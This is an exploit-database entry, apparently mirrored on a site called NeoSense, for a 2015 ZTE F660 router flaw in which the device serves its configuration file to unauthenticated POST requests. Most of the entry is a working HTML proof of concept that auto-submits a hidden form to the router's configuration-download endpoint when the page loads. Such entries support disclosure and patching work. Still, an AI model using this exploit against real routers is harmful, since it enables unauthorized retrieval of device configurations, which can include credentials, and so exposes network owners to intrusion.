[] NeoSense
E X P L O I T S
title author type platform port cve id

ZTE F660 - Remote Configuration Download

Author: Daniel Cisa
type: webapps
platform: hardware
port: 
date_added: 2015-05-11 
date_updated: 2015-05-11 
verified: 0 
codes: OSVDB-121896 
tags: 
aliases:  
screenshot_url:  
application_url: 
/*
Exploit Title   : ZTE remote configuration download
Date            : 09 May 2015
Exploit Author  : Daniel Cisa
Vendor Homepage : http://wwwen.zte.com.cn/en/
Platform        : Hardware
Tested On       : ZTE F660
Firmware Version: 2.22.21P1T8S
--------------------------
 Config remote download
--------------------------
ZTE F660 Embedded Software does not check Cookies And Credentials on POST
method so
attackers could download the config file with this post method without
authentication.

*/
<html>
<body onload="document.fDownload.submit();">
<form name="fDownload" method="POST" action="
http://192.168.1.1/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch"
enctype="multipart/form-data" onsubmit="return false;">
Request Sent....
<input type="hidden" name="config" id="config" value="">
</body>
</html>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.